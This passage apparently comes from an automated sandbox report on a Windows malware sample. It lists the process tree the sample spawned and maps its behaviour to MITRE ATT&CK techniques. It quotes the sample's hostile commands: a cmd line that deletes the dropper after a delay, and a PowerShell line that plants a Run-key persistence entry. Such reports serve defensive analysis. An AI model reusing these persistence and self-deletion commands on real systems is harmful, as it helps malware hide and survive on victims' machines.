PID:9064

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:11280

C:\Users\Admin\AppData\Local\Temp\9146.exe
C:\Users\Admin\AppData\Local\Temp\9146.exe
1⤵
PID:11568
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9146.exe"
  2⤵
  PID:17972
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:8056
- C:\Users\Admin\AppData\Local\Temp\xjlSyl3QAh.exe
  "C:\Users\Admin\AppData\Local\Temp\xjlSyl3QAh.exe"
  2⤵
  PID:17964
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DriverService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'DriverService' -Value '"C:\Users\Admin\AppData\Roaming\WinServices\DriversService.exe"' -PropertyType 'String'
    3⤵
    PID:18388

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:16420

C:\Users\Admin\AppData\Roaming\wirbfsf
C:\Users\Admin\AppData\Roaming\wirbfsf
1⤵
PID:22496

C:\Users\Admin\AppData\Roaming\rsrbfsf
C:\Users\Admin\AppData\Roaming\rsrbfsf
1⤵
PID:16624

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery